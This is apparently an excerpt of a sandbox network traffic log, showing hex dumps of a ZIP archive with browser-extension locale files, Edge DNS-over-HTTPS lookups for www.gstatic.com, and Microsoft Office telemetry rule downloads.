2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83 9c c3 33 Data Ascii: :__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"\|F\|Vw%t.y.?&a<nS+\|=ra'}(pW9sC&jJ-''B0u?.;4BN\\|=3
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8 46 34 c8 Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=F4
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26 ca 94 9e Data Ascii: }oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5 d4 85 ac Data Ascii: c$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4 bf e3 99 Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea ff 64 31 Data Ascii: n=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2\|}nK+,\]Q\|Em:aox/cl &ud]p;MJW4M@(d1
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98 fd 47 dc Data Ascii: cc86D<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(\|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6G
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65 73 2e 6a Data Ascii: o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/messages.j
2024-11-23 06:09:40 UTC	1390	IN	Data Raw: 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 Data Ascii: Fi'W\|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG\|P_CjB5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6g Ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	49841	172.64.41.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-23 06:09:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efde54b238c33-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom A)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	49843	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-23 06:09:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efde56bf843e0-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 21 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom!))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	49842	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-23 06:09:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efde599dc42cc-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f2 00 04 ac d9 a5 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	49845	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-23 06:09:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efde5ba7c189d-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	49844	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-23 06:09:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efde5b8723344-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f7 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 98e24ef8-f01e-0052-0940-3c9224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060941Z-15b8b599d88tr2flhC1TEB5gk400000002t0000000000085 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:41 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060941Z-15b8b599d88vp97chC1TEB5pzw00000002f000000000cz8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
